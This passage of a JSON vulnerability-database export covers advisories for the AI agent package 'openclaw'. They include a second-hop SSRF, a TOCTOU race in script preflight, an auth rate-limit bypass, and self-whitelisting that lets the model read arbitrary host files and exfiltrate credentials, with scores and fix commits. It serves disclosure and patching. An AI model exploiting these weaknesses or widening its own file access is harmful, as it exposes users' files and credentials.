scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:
H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43576"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-second-hop-ssrf-via-cdp-json-version-websocket-url","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"4.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:N/SC:H/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-07T12:30:18Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-second-hop-ssrf-via-cdp-json-version-websocket-url"},{"reference_url":"https://github.com/advisories/GHSA-f7fh-qg34-x2xh","reference_id":"GHSA-f7fh-qg34-x2xh","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-f7fh-qg34-x2xh"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/110881?format=json","purl":"pkg:npm/openclaw@2026.4.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2g7x-vu14-nkde"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerabilit
y":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dqb2-dej7-augt"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerabilit
y":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-x1qe-u363-qqaa"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.5"}],"aliases":["CVE-2026-43576","GHSA-f7fh-qg34-x2xh"],"risk_score":3.5,"exploitability":"0.5","weighted_severity":"6.9","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wyce-qxau-mqff"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89271?format=json","vulnerability_id":"VCID-x2ru-ydpv-f3ah","summary":"OpenClaw: TOCTOU read in exec script preflight\n## Summary\n\nOpenClaw's exec script preflight validator previously validated and then read a script by mutable pathname. A local race could swap the path between validation and read, causing preflight analysis to inspect a different file identity than the one that passed the workspace boundary check.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Ecosystem: npm\n- Affected versions: `< 2026.4.10`\n- Patched versions: `>= 2026.4.10`\n\n## Impact\n\nThe impact is limited. This was not arbitrary full-file disclosure through the preflight error path. The validator only surfaced derived preflight content, such as a matched token, a line number, or the first non-empty JavaScript line in one branch. Exploitation also required the ability to mutate the relevant workspace path during the preflight window.\n\nStill, this was a real TOCTOU boundary bug in code that is supposed to reason about workspace-local script files before execution. 
A file identity that passed the initial boundary validation could differ from the identity that was later read for preflight analysis.\n\n## Technical Details\n\nThe vulnerable flow in `validateScriptFileForShellBleed` validated the path and read the file as two separate steps. Because the read was path-based, an attacker with write access to the workspace path could race to replace the target after validation but before the preflight read.\n\n## Fix\n\nPR #62333 replaced the check-then-read flow with a pinned safe-open/read path using the shared `readFileWithinRoot` helper. The fixed path performs boundary verification around the opened file identity and avoids relying on a mutable pathname for the final preflight read. Regression tests cover both pre-open and post-open swap windows.\n\n## Fix Commit(s)\n\n- `b024fae9e5df43e9b69b2daebb72be3469d52e91` (`fix(exec): replace TOCTOU check-then-read with atomic pinned-fd open in script preflight [AI]`)\n- PR: #62333\n\n## Release Process Note\n\nThe fix first shipped in `v2026.4.10`. 
Users should upgrade to `openclaw` `2026.4.10` or newer; the latest npm release already includes the fix.\n\n## Credits\n\nThanks to @kikayli for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43529","reference_id":"","reference_type":"","scores":[{"value":"0.00011","scoring_system":"epss","scoring_elements":"0.01547","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02173","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00013","scoring_system":"epss","scoring_elements":"0.02192","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43529"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/b024fae9e5df43e9b69b2daebb72be3469d52e91","reference_id":"","reference_type":"","scores":[{"value":"2.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:18:03Z/"}],"url":"https://github.com/openclaw/openclaw/commit/b024fae9e5df43e9b69b2daebb72be3469d52e91"},{"reference_url":"https://github.com/openclaw/openclaw/pull/62333","reference_id":"","reference_type":"","scores":[{"value":"2.1","scoring_system"
:"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/62333"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-gj9q-8w99-mp8j","reference_id":"","reference_type":"","scores":[{"value":"2.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"2.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:18:03Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-gj9q-8w99-mp8j"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43529","reference_id":"CVE-2026-43529","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43529"},{"reference_url":"https://github.com/advisories/GHSA-gj9q-8w99-mp8j","reference_id":"GHSA-gj9q-8w99-mp8j","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-gj9q-8w99-mp8j"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-time-of-check-time-of-use-toctou-race-condition-in-exec-script-preflight-validator","reference_id":"openclaw-time-of-check-time-of-use-toctou-race-condition-in-exec-script-preflight-validator","reference_type":"","scores":[{"value":"2.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/
AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-05-05T12:18:03Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-time-of-check-time-of-use-toctou-race-condition-in-exec-script-preflight-validator"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109896?format=json","purl":"pkg:npm/openclaw@2026.4.10","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-6cfj-zugb-7uhq"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-h9a4-1twb-d7d1"},{"vulnerability":"VCID-hphn-8fnj-qkh2"},{"vulnerability":"VCID-hy24-6xpe-pkb7"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-q3a2-qk5j-1yat"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-
xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.10"}],"aliases":["CVE-2026-43529","GHSA-gj9q-8w99-mp8j"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x2ru-ydpv-f3ah"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90206?format=json","vulnerability_id":"VCID-x4hn-ygbg-mkep","summary":"OpenClaw: Fake DeviceToken Bypasses Shared Auth Rate Limiting\n## Summary\nFake DeviceToken Bypasses Shared Auth Rate Limiting\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: low\n- Assessment: Real in shipped mixed WS auth flow, but practical risk is mostly weak shared-password deployments since strong shared tokens remain non-bruteforceable.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `af0c0862f22ca4492406a3103d05e3628f94cbe9` — 2026-03-31T09:08:57+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n\nOpenClaw thanks @kexinoh of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard)  for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41333","reference_id":"","reference_type":"","scores":[{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23481","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23421","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23468","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41333"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/af0c0862f22ca4492406a3103d05e3628f94cbe9","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:35:25Z/"}],"url":"https://github.com/openclaw/openclaw/commit/af0c0862f22ca4492406a3103d05e3628f94cbe9"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/
AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6p8r-6m93-557f","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:35:25Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-6p8r-6m93-557f"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-authentication-rate-limiting-bypass-via-fake-devicetoken","reference_id":"","reference_type":"","scores":[{"value":"3.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T13:35:25Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-authentication-rate-limiting-bypass-via-fake-devicetoken"},{"reference_url":"https://github.com/advisories/GHSA-6p8r-6m93-557f","reference_id":"GHSA-6p8r-6m93-557f","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6p8r-6m93-557f"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/pa
ckages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vul
nerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"res
ource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41333","GHSA-6p8r-6m93-557f"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x4hn-ygbg-mkep"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90028?format=json","vulnerability_id":"VCID-x794-wfnf-1ugf","summary":"OpenClaw: Self-Whitelisting in appendLocalMediaParentRoots Allows Arbitrary File Read & Credential Exfiltration\n## Summary\nMedia Local Roots Self-Whitelisting in `appendLocalMediaParentRoots` Allows Model-Initiated Arbitrary Host File Read and Credential Exfiltration\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: v2026.3.28 still self-whitelists media parent dirs in src/media/local-roots.ts, but only after config already permits tool-fs root expansion, so the impact is narrower than the default-critical framing.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `1ca4261d7e055d0be141ed79ebb1365d0fbc7364` — 2026-03-30T17:15:03+01:00\n\nOpenClaw thanks @tdjackey for 
reporting.","references":[{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/1ca4261d7e055d0be141ed79ebb1365d0fbc7364","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/1ca4261d7e055d0be141ed79ebb1365d0fbc7364"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-57gh-m6rq-54cf","reference_id":"","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-57gh-m6rq-54cf"},{"reference_url":"https://github.com/advisories/GHSA-57gh-m6rq-54cf","reference_id":"GHSA-57gh-m6rq-54cf","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-57gh-m6rq-54cf"}],"fixed_packages":[{"url":"http://public2.vulnera